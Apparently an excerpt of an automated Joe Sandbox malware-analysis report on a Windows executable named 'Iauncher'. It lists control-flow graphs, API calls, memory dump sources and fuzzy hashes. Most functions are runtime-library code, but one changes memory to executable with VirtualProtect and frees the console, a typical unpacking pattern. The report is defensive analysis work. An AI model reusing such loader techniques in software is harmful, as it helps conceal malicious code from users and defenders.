                                                                                                                                                    control_flow_graph 21 5769bb-5769d4 22 5769d6-5769e6 call 57011d 21->22 23 5769ea-5769ef 21->23 22->23 29 5769e8 22->29 25 5769f1-5769fb 23->25 26 5769fe-576a24 call 578f33 23->26 25->26 31 576b97-576ba8 call 5662ac 26->31 32 576a2a-576a35 26->32 29->23 34 576a3b-576a40 32->34 35 576b8a 32->35 36 576a55-576a60 call 5745c0 34->36 37 576a42-576a4b call 566850 34->37 38 576b8c 35->38 47 576a6b-576a6f 36->47 48 576a62 36->48 46 576a4d-576a53 37->46 37->47 42 576b8e-576b95 call 5660d3 38->42 42->31 50 576a68 46->50 47->38 51 576a75-576a8c call 578f33 47->51 48->50 50->47 51->38 54 576a92-576aa4 call 575e56 51->54 56 576aa9-576aad 54->56 57 576aaf-576ab7 56->57 58 576ac8-576aca 56->58 59 576af1-576afd 57->59 60 576ab9-576abe 57->60 58->38 63 576aff-576b01 59->63 64 576b7c 59->64 61 576ac4-576ac6 60->61 62 576b70-576b72 60->62 61->58 66 576acf-576ae9 call 575e56 61->66 62->42 67 576b16-576b21 call 5745c0 63->67 68 576b03-576b0c call 566850 63->68 65 576b7e-576b85 call 5660d3 64->65 65->58 66->62 78 576aef 66->78 67->65 77 576b23 67->77 68->65 79 576b0e-576b14 68->79 80 576b29-576b2e 77->80 78->58 79->80 80->65 81 576b30-576b48 call 575e56 80->81 81->65 84 576b4a-576b51 81->84 85 576b74-576b7a 84->85 86 576b53-576b54 84->86 87 576b55-576b67 call 578faf 85->87 86->87 87->65 90 576b69-576b6f call 5660d3 87->90 90->62
                                                                                                                                                    APIs
                                                                                                                                                    • __alloca_probe_16.LIBCMT ref: 00576A42
                                                                                                                                                    • __alloca_probe_16.LIBCMT ref: 00576B03
                                                                                                                                                    • __freea.LIBCMT ref: 00576B6A
                                                                                                                                                      • Part of subcall function 005745C0: RtlAllocateHeap.NTDLL(00000000,00564449,?,?,00568DF4,?,?,?,?,?,005621CC,00564449,?,?,?,?), ref: 005745F2
                                                                                                                                                    • __freea.LIBCMT ref: 00576B7F
                                                                                                                                                    • __freea.LIBCMT ref: 00576B8F
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 0000000B.00000002.1282245123.0000000000561000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00560000, based on PE: true
                                                                                                                                                    • Associated: 0000000B.00000002.1282221168.0000000000560000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                    • Associated: 0000000B.00000002.1282309727.0000000000584000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                    • Associated: 0000000B.00000002.1282336889.000000000058E000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                    • Associated: 0000000B.00000002.1282336889.00000000005C4000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                    • Associated: 0000000B.00000002.1282336889.00000000005D3000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                    • Associated: 0000000B.00000002.1282753451.00000000005DC000.00000040.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                    • Associated: 0000000B.00000002.1283537777.00000000005DD000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_11_2_560000_Iauncher.jbxd
                                                                                                                                                    Yara matches
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: __freea$__alloca_probe_16$AllocateHeap
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID: 1423051803-0
                                                                                                                                                    • Opcode ID: 88cdc78730163c30d78f619839e2a5bd8191e3acd855ad70fc20a28e66253f45
                                                                                                                                                    • Instruction ID: 75ccacdb1abb48a8ce29557907a02f3490e0a1303acd1e7ae797188e494db110
                                                                                                                                                    • Opcode Fuzzy Hash: 88cdc78730163c30d78f619839e2a5bd8191e3acd855ad70fc20a28e66253f45
                                                                                                                                                    • Instruction Fuzzy Hash: B551A072600616AFEB249FA4AC85EBB3EA9FF45750B198529FD0CE7110E771CD10A7A0
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Function 00561E76 Relevance: 6.0, APIs: 4, Instructions: 48COMMON
                                                                                                                                                    Download Yara Rule

                                                                                                                                                    Control-flow Graph

                                                                                                                                                    • Executed
                                                                                                                                                    • Not Executed
                                                                                                                                                    control_flow_graph 93 561e76-561ea7 call 5642b1 call 562577 call 562ae8 100 561edb-561ee8 call 564309 93->100 101 561ea9-561eab 93->101 102 561eb1-561eb8 call 562a82 101->102 103 561ead-561eaf 101->103 107 561ebd-561ec2 102->107 103->100 108 561ec4-561ed5 call 5645fc 107->108 109 561ee9-561eee call 5632eb 107->109 108->100
                                                                                                                                                    APIs
                                                                                                                                                    • std::_Lockit::_Lockit.LIBCPMT ref: 00561E82
                                                                                                                                                    • int.LIBCPMT ref: 00561E95
                                                                                                                                                      • Part of subcall function 00562577: std::_Lockit::_Lockit.LIBCPMT ref: 00562588
                                                                                                                                                      • Part of subcall function 00562577: std::_Lockit::~_Lockit.LIBCPMT ref: 005625A2
                                                                                                                                                    • std::_Facet_Register.LIBCPMT ref: 00561EC8
                                                                                                                                                    • std::_Lockit::~_Lockit.LIBCPMT ref: 00561EDE
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 0000000B.00000002.1282245123.0000000000561000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00560000, based on PE: true
                                                                                                                                                    • Associated: 0000000B.00000002.1282221168.0000000000560000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                    • Associated: 0000000B.00000002.1282309727.0000000000584000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                    • Associated: 0000000B.00000002.1282336889.000000000058E000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                    • Associated: 0000000B.00000002.1282336889.00000000005C4000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                    • Associated: 0000000B.00000002.1282336889.00000000005D3000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                    • Associated: 0000000B.00000002.1282753451.00000000005DC000.00000040.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                    • Associated: 0000000B.00000002.1283537777.00000000005DD000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_11_2_560000_Iauncher.jbxd
                                                                                                                                                    Yara matches
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: std::_$Lockit$Lockit::_Lockit::~_$Facet_Register
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID: 459529453-0
                                                                                                                                                    • Opcode ID: 3550a822abc965a789baebbff62daa528c0e1feb9f1ab96713201f58ec4a026f
                                                                                                                                                    • Instruction ID: b08145c148209b20beb3ba9e91ed4e9f7ad7c21ee88023089aeb25c7748c419f
                                                                                                                                                    • Opcode Fuzzy Hash: 3550a822abc965a789baebbff62daa528c0e1feb9f1ab96713201f58ec4a026f
                                                                                                                                                    • Instruction Fuzzy Hash: 6A01A732900515ABCB15AB94D91A8BD7FBCFF947A0F240155FD01AB390EB71DE41DB84
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Function 005657BD Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 116COMMON
                                                                                                                                                    Download Yara Rule

                                                                                                                                                    Control-flow Graph

                                                                                                                                                    • Executed
                                                                                                                                                    • Not Executed
                                                                                                                                                    control_flow_graph 115 5657bd-5657dd 116 5657df-5657e6 call 5657a3 115->116 117 5657e8-5657ef 115->117 125 56583d-56584b call 5662ac 116->125 119 565811-565815 117->119 120 5657f1-5657fb 117->120 123 565817-565826 call 565419 119->123 124 56583a 119->124 120->119 122 5657fd-56580f 120->122 122->125 130 56584e-565883 123->130 131 565828-56582c call 564c2e 123->131 124->125 137 565885-565888 130->137 138 5658a9-5658b1 130->138 134 565831-565835 131->134 134->124 135 565837 134->135 135->124 137->138 139 56588a-56588e 137->139 140 5658b3-5658c4 call 56f796 138->140 141 5658ca-5658d4 138->141 139->124 143 565890-56589f call 564c2e 139->143 140->124 140->141 141->124 142 5658da-5658dd 141->142 142->125 143->124 148 5658a1-5658a7 143->148 148->124
                                                                                                                                                    APIs
                                                                                                                                                    Strings
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 0000000B.00000002.1282245123.0000000000561000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00560000, based on PE: true
                                                                                                                                                    • Associated: 0000000B.00000002.1282221168.0000000000560000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                    • Associated: 0000000B.00000002.1282309727.0000000000584000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                    • Associated: 0000000B.00000002.1282336889.000000000058E000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                    • Associated: 0000000B.00000002.1282336889.00000000005C4000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                    • Associated: 0000000B.00000002.1282336889.00000000005D3000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                    • Associated: 0000000B.00000002.1282753451.00000000005DC000.00000040.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                    • Associated: 0000000B.00000002.1283537777.00000000005DD000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_11_2_560000_Iauncher.jbxd
                                                                                                                                                    Yara matches
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: Fputc
                                                                                                                                                    • String ID: SV
                                                                                                                                                    • API String ID: 3078413507-4155469514
                                                                                                                                                    • Opcode ID: 69c29add2eba79d023c5cacbbff842d8ee6a7904a38d9cb75cf1a9ae746c1dc1
                                                                                                                                                    • Instruction ID: 705a367a39f8e696eb0b1248b13a4680adb09eaa7f2071aaf29ce5dc3e0bed5f
                                                                                                                                                    • Opcode Fuzzy Hash: 69c29add2eba79d023c5cacbbff842d8ee6a7904a38d9cb75cf1a9ae746c1dc1
                                                                                                                                                    • Instruction Fuzzy Hash: 2C41923695161AEBCF15DFA4C9848EDBBB8FF18354F644026E901A7A40FB31ED45CB90
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Function 00583416 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 46memoryCOMMON
                                                                                                                                                    Download Yara Rule

                                                                                                                                                    Control-flow Graph

                                                                                                                                                    APIs
                                                                                                                                                      • Part of subcall function 00561F47: _strlen.LIBCMT ref: 00561F5F
                                                                                                                                                    • VirtualProtect.KERNELBASE(005DC030,000004AC,00000040,?,006:107@4:@00007:277@0:@004:@04:@008:@08:@08:@8:@7:2@3:@9:193@4:@), ref: 00583468
                                                                                                                                                    • FreeConsole.KERNELBASE ref: 0058346E
                                                                                                                                                    Strings
                                                                                                                                                    • 006:107@4:@00007:277@0:@004:@04:@008:@08:@08:@8:@7:2@3:@9:193@4:@, xrefs: 00583427
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 0000000B.00000002.1282245123.0000000000561000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00560000, based on PE: true
                                                                                                                                                    • Associated: 0000000B.00000002.1282221168.0000000000560000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                    • Associated: 0000000B.00000002.1282309727.0000000000584000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                    • Associated: 0000000B.00000002.1282336889.000000000058E000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                    • Associated: 0000000B.00000002.1282336889.00000000005C4000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                    • Associated: 0000000B.00000002.1282336889.00000000005D3000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                    • Associated: 0000000B.00000002.1282753451.00000000005DC000.00000040.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                    • Associated: 0000000B.00000002.1283537777.00000000005DD000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_11_2_560000_Iauncher.jbxd
                                                                                                                                                    Yara matches
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: ConsoleFreeProtectVirtual_strlen
                                                                                                                                                    • String ID: 006:107@4:@00007:277@0:@004:@04:@008:@08:@08:@8:@7:2@3:@9:193@4:@
                                                                                                                                                    • API String ID: 1248733679-32248209
                                                                                                                                                    • Opcode ID: 3acd037dd55afd264a69eee25bd8bd1e22b7fb3f69173a479e0a34af0da480b0
                                                                                                                                                    • Instruction ID: 8803ce2b956c4dde3d8f0f85293b6ea025fad8f0b7333dcd1c93298929facdba
                                                                                                                                                    • Opcode Fuzzy Hash: 3acd037dd55afd264a69eee25bd8bd1e22b7fb3f69173a479e0a34af0da480b0
                                                                                                                                                    • Instruction Fuzzy Hash: 52018F30A01206DBDB14FBA4EC1EBAE7FA4BB45B00F508526E901FB191EE649A05CB55
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Function 00575E56 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 34COMMONLIBRARYCODE
                                                                                                                                                    Download Yara Rule

                                                                                                                                                    Control-flow Graph

                                                                                                                                                    • Executed
                                                                                                                                                    • Not Executed
                                                                                                                                                    control_flow_graph 166 575e56-575e65 call 575988 169 575e67-575e8c LCMapStringEx 166->169 170 575e8e-575ea8 call 575eb3 LCMapStringW 166->170 174 575eae-575eb0 169->174 170->174
                                                                                                                                                    APIs
                                                                                                                                                    • LCMapStringEx.KERNELBASE(?,00576AA9,?,?,00000000,?,00000000,00000000,00000000,00000000,00000000), ref: 00575E8A
                                                                                                                                                    • LCMapStringW.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,?,00000000,?,?,00576AA9,?,?,00000000,?,00000000), ref: 00575EA8
                                                                                                                                                    Strings
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 0000000B.00000002.1282245123.0000000000561000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00560000, based on PE: true
                                                                                                                                                    • Associated: 0000000B.00000002.1282221168.0000000000560000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                    • Associated: 0000000B.00000002.1282309727.0000000000584000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                    • Associated: 0000000B.00000002.1282336889.000000000058E000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                    • Associated: 0000000B.00000002.1282336889.00000000005C4000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                    • Associated: 0000000B.00000002.1282336889.00000000005D3000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                    • Associated: 0000000B.00000002.1282753451.00000000005DC000.00000040.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                    • Associated: 0000000B.00000002.1283537777.00000000005DD000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_11_2_560000_Iauncher.jbxd
                                                                                                                                                    Yara matches
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: String
                                                                                                                                                    • String ID: SV
                                                                                                                                                    • API String ID: 2568140703-4155469514
                                                                                                                                                    • Opcode ID: b2e96f986c9228a47999d00649ecf1b448be32410a5a32dcc332f57a99442acf
                                                                                                                                                    • Instruction ID: 4d82f208f59d770e0486873082411e5121b829707abe26d4da4fb12a6788b660
                                                                                                                                                    • Opcode Fuzzy Hash: b2e96f986c9228a47999d00649ecf1b448be32410a5a32dcc332f57a99442acf
                                                                                                                                                    • Instruction Fuzzy Hash: A0F0643240051EBBCF126F90ED09DDE7E6ABF583A1F068154FE1825120DA76DA72BB90
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Function 00570E13 Relevance: 4.5, APIs: 3, Instructions: 15COMMONLIBRARYCODE
                                                                                                                                                    Download Yara Rule

                                                                                                                                                    Control-flow Graph

                                                                                                                                                    APIs
                                                                                                                                                    • GetCurrentProcess.KERNEL32(?,?,00570E0D,00000000,0056AAD2,?,?,940D2BD2,0056AAD2,?), ref: 00570E24
                                                                                                                                                    • TerminateProcess.KERNEL32(00000000,?,00570E0D,00000000,0056AAD2,?,?,940D2BD2,0056AAD2,?), ref: 00570E2B
                                                                                                                                                    • ExitProcess.KERNEL32 ref: 00570E3D
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 0000000B.00000002.1282245123.0000000000561000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00560000, based on PE: true
                                                                                                                                                    • Associated: 0000000B.00000002.1282221168.0000000000560000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                    • Associated: 0000000B.00000002.1282309727.0000000000584000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                    • Associated: 0000000B.00000002.1282336889.000000000058E000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                    • Associated: 0000000B.00000002.1282336889.00000000005C4000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                    • Associated: 0000000B.00000002.1282336889.00000000005D3000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                    • Associated: 0000000B.00000002.1282753451.00000000005DC000.00000040.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                    • Associated: 0000000B.00000002.1283537777.00000000005DD000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_11_2_560000_Iauncher.jbxd
                                                                                                                                                    Yara matches
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: Process$CurrentExitTerminate
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID: 1703294689-0
                                                                                                                                                    • Opcode ID: e930c62ea5019206eb0511b473c5bb24f42872a43d2fed3a1e011e1c7e0d627b
                                                                                                                                                    • Instruction ID: 8ae028202ad879ed5b1e62db6f40c56342d08a7732d1e3ba8066568aa8bc0b84
                                                                                                                                                    • Opcode Fuzzy Hash: e930c62ea5019206eb0511b473c5bb24f42872a43d2fed3a1e011e1c7e0d627b
                                                                                                                                                    • Instruction Fuzzy Hash: 2FD06771000105EFCF016F60FC0D95E3F69BB94345714A414BE496A1A1DB75999ABB50
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Function 00578126 Relevance: 3.2, APIs: 2, Instructions: 191fileCOMMONLIBRARYCODE
                                                                                                                                                    Download Yara Rule

                                                                                                                                                    Control-flow Graph

                                                                                                                                                    • Executed
                                                                                                                                                    • Not Executed
                                                                                                                                                    control_flow_graph 182 578126-578145 183 57831f 182->183 184 57814b-57814d 182->184 187 578321-578325 183->187 185 57814f-57816e call 56ac52 184->185 186 578179-57819f 184->186 193 578171-578174 185->193 189 5781a5-5781ab 186->189 190 5781a1-5781a3 186->190 189->185 192 5781ad-5781b7 189->192 190->189 190->192 194 5781c7-5781d2 call 577caa 192->194 195 5781b9-5781c4 call 578b99 192->195 193->187 200 578214-578226 194->200 201 5781d4-5781d9 194->201 195->194 204 578277-578297 WriteFile 200->204 205 578228-57822e 200->205 202 5781fe-578212 call 577870 201->202 203 5781db-5781df 201->203 224 5781f7-5781f9 202->224 206 5782e7-5782f9 203->206 207 5781e5-5781f4 call 577c42 203->207 209 5782a2 204->209 210 578299-57829f GetLastError 204->210 211 578265-578270 call 577d28 205->211 212 578230-578233 205->212 213 578303-578315 206->213 214 5782fb-578301 206->214 207->224 218 5782a5-5782b0 209->218 210->209 223 578275 211->223 219 578235-578238 212->219 220 578253-578263 call 577eec 212->220 213->193 214->183 214->213 225 5782b2-5782b7 218->225 226 57831a-57831d 218->226 219->206 227 57823e-578249 call 577e03 219->227 229 57824e-578251 220->229 223->229 224->218 230 5782e5 225->230 231 5782b9-5782be 225->231 226->187 227->229 229->224 230->206 233 5782d7-5782e0 call 56e2a9 231->233 234 5782c0-5782d2 231->234 233->193 234->193
                                                                                                                                                    APIs
                                                                                                                                                      • Part of subcall function 00577870: GetConsoleOutputCP.KERNEL32(940D2BD2,00000000,00000000,00000000), ref: 005778D3
                                                                                                                                                    • WriteFile.KERNEL32(?,00000000,?,0058D558,00000000,0000000C,00000000,00000000,?,00000000,0058D558,00000010,0056F70D,00000000,00000000,00000000), ref: 0057828F
                                                                                                                                                    • GetLastError.KERNEL32(?,00000000), ref: 00578299
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 0000000B.00000002.1282245123.0000000000561000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00560000, based on PE: true
                                                                                                                                                    • Associated: 0000000B.00000002.1282221168.0000000000560000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                    • Associated: 0000000B.00000002.1282309727.0000000000584000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                    • Associated: 0000000B.00000002.1282336889.000000000058E000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                    • Associated: 0000000B.00000002.1282336889.00000000005C4000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                    • Associated: 0000000B.00000002.1282336889.00000000005D3000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                    • Associated: 0000000B.00000002.1282753451.00000000005DC000.00000040.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                    • Associated: 0000000B.00000002.1283537777.00000000005DD000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_11_2_560000_Iauncher.jbxd
                                                                                                                                                    Yara matches
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: ConsoleErrorFileLastOutputWrite
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID: 2915228174-0
                                                                                                                                                    • Opcode ID: 09d4a625c2f4ffa68259426922ad72dbd83c7a0243d7a913f12cab6404615766
                                                                                                                                                    • Instruction ID: 58a40b03cb3889683997a733a767b92b65895418c9675a2d2bff4eede24a63a0
                                                                                                                                                    • Opcode Fuzzy Hash: 09d4a625c2f4ffa68259426922ad72dbd83c7a0243d7a913f12cab6404615766
                                                                                                                                                    • Instruction Fuzzy Hash: 126191B5D44149AEDF118FA8EC4CAFE7FB9BF49304F148499E808A7252D731D905EB60
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Function 0057A0BA Relevance: 3.2, APIs: 2, Instructions: 177COMMON
                                                                                                                                                    Download Yara Rule

                                                                                                                                                    Control-flow Graph

                                                                                                                                                    • Executed
                                                                                                                                                    • Not Executed
                                                                                                                                                    control_flow_graph 237 57a0ba-57a0e2 call 579bea 240 57a2aa-57a2ab call 579c5b 237->240 241 57a0e8-57a0ee 237->241 246 57a2b0-57a2b2 240->246 243 57a0f1-57a0f7 241->243 244 57a0fd-57a109 243->244 245 57a1f9-57a218 call 568c70 243->245 244->243 247 57a10b-57a111 244->247 256 57a21b-57a220 245->256 249 57a2b3-57a2c1 call 5662ac 246->249 250 57a117-57a123 IsValidCodePage 247->250 251 57a1f1-57a1f4 247->251 250->251 255 57a129-57a130 250->255 251->249 257 57a132-57a13e 255->257 258 57a158-57a165 GetCPInfo 255->258 259 57a222-57a227 256->259 260 57a25d-57a267 256->260 261 57a142-57a14e call 579cbe 257->261 263 57a167-57a186 call 568c70 258->263 264 57a1e5-57a1eb 258->264 265 57a25a 259->265 266 57a229-57a231 259->266 260->256 262 57a269-57a293 call 579bac 260->262 273 57a153 261->273 277 57a294-57a2a3 262->277 263->261 278 57a188-57a18f 263->278 264->240 264->251 265->260 270 57a233-57a236 266->270 271 57a252-57a258 266->271 272 57a238-57a23e 270->272 271->259 271->265 272->271 276 57a240-57a250 272->276 273->246 276->271 276->272 277->277 279 57a2a5 277->279 280 57a191-57a196 278->280 281 57a1bb-57a1be 278->281 279->240 280->281 283 57a198-57a1a0 280->283 282 57a1c3-57a1ca 281->282 282->282 284 57a1cc-57a1e0 call 579bac 282->284 285 57a1b3-57a1b9 283->285 286 57a1a2-57a1a9 283->286 284->261 285->280 285->281 287 57a1aa-57a1b1 286->287 287->285 287->287
                                                                                                                                                    APIs
                                                                                                                                                      • Part of subcall function 00579BEA: GetOEMCP.KERNEL32(00000000,?,?,00000000,?), ref: 00579C15
                                                                                                                                                    • IsValidCodePage.KERNEL32(-00000030,00000000,?,?,?,?,?,?,?,?,00579F01,?,00000000,?,00000000,?), ref: 0057A11B
                                                                                                                                                    • GetCPInfo.KERNEL32(00000000,?,?,?,?,?,?,?,?,00579F01,?,00000000,?,00000000,?), ref: 0057A15D
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 0000000B.00000002.1282245123.0000000000561000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00560000, based on PE: true
                                                                                                                                                    • Associated: 0000000B.00000002.1282221168.0000000000560000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                    • Associated: 0000000B.00000002.1282309727.0000000000584000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                    • Associated: 0000000B.00000002.1282336889.000000000058E000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                    • Associated: 0000000B.00000002.1282336889.00000000005C4000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                    • Associated: 0000000B.00000002.1282336889.00000000005D3000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                    • Associated: 0000000B.00000002.1282753451.00000000005DC000.00000040.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                    • Associated: 0000000B.00000002.1283537777.00000000005DD000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_11_2_560000_Iauncher.jbxd
                                                                                                                                                    Yara matches
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: CodeInfoPageValid
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID: 546120528-0
                                                                                                                                                    • Opcode ID: e02c8a962fdef58256cfd3fe87c88ec17f1597b9f610150ccdfc7811ee4285ec
                                                                                                                                                    • Instruction ID: 72c391ca6a1166e896c7cfbec6e51b06b31642eafabd0a6eb7b2839f547e5694
                                                                                                                                                    • Opcode Fuzzy Hash: e02c8a962fdef58256cfd3fe87c88ec17f1597b9f610150ccdfc7811ee4285ec
                                                                                                                                                    • Instruction Fuzzy Hash: DA514774A002458EEB20CF75E8856AEBFF5FFC1300F14C46ED08A9B252D7759946EB92
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Function 00577D28 Relevance: 3.1, APIs: 2, Instructions: 80fileCOMMONLIBRARYCODE
                                                                                                                                                    Download Yara Rule

                                                                                                                                                    Control-flow Graph

                                                                                                                                                    • Executed
                                                                                                                                                    • Not Executed
                                                                                                                                                    control_flow_graph 290 577d28-577d7d call 567020 293 577df2-577e02 call 5662ac 290->293 294 577d7f 290->294 296 577d85 294->296 298 577d8b-577d8d 296->298 299 577da7-577dcc WriteFile 298->299 300 577d8f-577d94 298->300 301 577dce-577dd9 299->301 302 577dea-577df0 GetLastError 299->302 303 577d96-577d9c 300->303 304 577d9d-577da5 300->304 301->293 305 577ddb-577de6 301->305 302->293 303->304 304->298 304->299 305->296 306 577de8 305->306 306->293
                                                                                                                                                    APIs
                                                                                                                                                    • WriteFile.KERNELBASE(?,?,?,?,00000000,00000000,00000000,00000000,?,00578275,00000000,00000000,00000000,?,0000000C,00000000), ref: 00577DC4
                                                                                                                                                    • GetLastError.KERNEL32(?,00578275,00000000,00000000,00000000,?,0000000C,00000000,00000000,?,00000000,0058D558,00000010,0056F70D,00000000,00000000), ref: 00577DEA
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 0000000B.00000002.1282245123.0000000000561000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00560000, based on PE: true
                                                                                                                                                    • Associated: 0000000B.00000002.1282221168.0000000000560000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                    • Associated: 0000000B.00000002.1282309727.0000000000584000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                    • Associated: 0000000B.00000002.1282336889.000000000058E000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                    • Associated: 0000000B.00000002.1282336889.00000000005C4000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                    • Associated: 0000000B.00000002.1282336889.00000000005D3000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                    • Associated: 0000000B.00000002.1282753451.00000000005DC000.00000040.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                    • Associated: 0000000B.00000002.1283537777.00000000005DD000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_11_2_560000_Iauncher.jbxd
                                                                                                                                                    Yara matches
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: ErrorFileLastWrite
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID: 442123175-0
                                                                                                                                                    • Opcode ID: e281234ca4adc7f903be0d184776f5feec9447226be7e2128d3bbc0f5c548025
